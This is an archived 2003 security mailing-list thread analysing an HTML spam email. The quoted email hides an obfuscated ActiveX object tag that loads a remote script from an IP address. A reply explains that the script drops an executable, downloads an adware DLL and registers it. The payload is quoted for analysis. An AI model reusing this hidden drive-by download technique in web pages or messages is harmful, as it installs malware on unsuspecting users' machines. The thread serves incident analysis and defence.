|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: Spam-Object Exploit
From: Suresh Ponnusami (surya
nsecure.net)
Date: Fri Sep 05 2003 - 00:59:21 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This exploits the ActiveX vulnerability for executing .vbs files
The encoded data points to http://63.246.130.201/cgi-bin/a.cgi
which is a .vbs named as .cgi. The script creates an exe called
drg.exe at the "C Drive" which downloads and installs
surferbar.dll from the same site. The dll is downloaded into
"C:\Program files\" as "Win32.dll" and regsvr is called to
register the dll. and when your browser starts it'll start displaying
ads and you will be earning counts/clicks for the spammer.
cheers,
Suresh Ponnusami,
Information Security Consultant,
nSecure Software, INDIA
----- Original Message -----
From: "Jon Zerden" <jzbugtraqpchmail.com>
To: <incidentssecurityfocus.com>
Sent: Thursday, 04 September, 2003 08:25 PM
Subject: Spam-Object Exploit
>
>
> I recently received the following HTML spam e-mail:
>
> ----<html>
> <head>
> <div style="display.none"><object
data="http://%363.2%346.%3130.2%30%31%2F%
> 63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>
> </head>
> <body>
> <p>Hey,</p>
> <p>Want to go to the pub on Saturday?</p>
> <p>Last Saturday was a blast!</p>
> <p>Let me know!</p>
> </body>
> ------</html>
>
> It is my assumption that the “Attacker” was trying to exploit the Object
> IE vulnerability discussed in Microsoft bulleting MS03-032.
>
> Has anyone else seen similar spam emails? Does anyone know what this
> Active X object does?
>
> Thanks
---------------------------------------------------------------------------
Attend Black Hat Briefings & Training Federal, September 29-30 (Training),
October 1-2 (Briefings) in Tysons Corner, VA; the world's premier
technical IT security event. Modeled after the famous Black Hat event in
Las Vegas! 6 tracks, 12 training sessions, top speakers and sponsors.
Symantec is the Diamond sponsor. Early-bird registration ends September 6.Visit us: www.blackhat.com
----------------------------------------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]